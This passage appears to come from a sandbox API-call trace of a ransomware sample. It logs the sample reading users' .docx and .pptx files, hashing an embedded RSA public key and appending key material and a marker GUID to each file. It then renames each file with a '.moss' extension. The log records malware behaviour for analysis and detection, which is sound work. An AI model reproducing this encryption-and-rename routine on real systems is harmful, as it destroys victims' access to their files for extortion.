lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbf48 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf18 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbf60 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf30 | out: hHeap=0xcd0000) returned 1 [0169.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbf30 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf30 | out: hHeap=0xcd0000) returned 1 [0169.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b50b68 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b50b68 | out: hHeap=0xcd0000) returned 1 [0169.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf60 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf48 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf18 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf00 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b457d0 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.611] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x833a, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb14*=0x833a, lpOverlapped=0x0) returned 1 [0169.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.612] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x833f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.612] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.612] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.612] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.612] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.612] CloseHandle (hObject=0x664) returned 1 [0169.613] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a98 [0169.613] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0169.613] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2a98 | out: hHeap=0xcd0000) returned 1 [0169.613] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0f4pt.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0f4pt.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0f4pt.pptx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0f4pt.pptx.moss")) returned 1 [0169.614] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.614] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.614] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.616] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb216a280, ftCreationTime.dwHighDateTime=0x1d55f83, ftLastAccessTime.dwLowDateTime=0xdff84fb0, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xdff84fb0, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6kq1Q5gxebf0czzCUr2.docx", cAlternateFileName="6KQ1Q5~1.DOC")) returned 1 [0169.616] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.616] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0169.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.616] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6kq1Q5gxebf0czzCUr2.docx") returned=".docx" [0169.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6kq1Q5gxebf0czzCUr2.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6kq1q5gxebf0czzcur2.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.617] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=8105) returned 1 [0169.617] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.620] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1f83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.620] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.621] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.621] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.621] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x1fa9, lpOverlapped=0x0) returned 1 [0169.621] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.621] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.621] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.621] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.623] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.623] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.623] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.623] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.623] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.623] GetLastError () returned 0x0 [0169.623] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.623] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.623] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.623] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.623] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.623] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.623] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.623] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1fb0) returned 0x3b48820 [0169.624] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.624] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b457d0 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf00 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45818 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf18 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf48 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf60 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.624] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b4a7d8 [0169.624] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf48 | out: hHeap=0xcd0000) returned 1 [0169.624] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf60 | out: hHeap=0xcd0000) returned 1 [0169.624] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.624] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.624] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4a7d8 | out: hHeap=0xcd0000) returned 1 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbf60 [0169.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbf48 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf60 | out: hHeap=0xcd0000) returned 1 [0169.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf48 | out: hHeap=0xcd0000) returned 1 [0169.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.625] GetCurrentThreadId () returned 0x324 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd32750 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.626] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1fa9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.626] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.626] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.626] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, 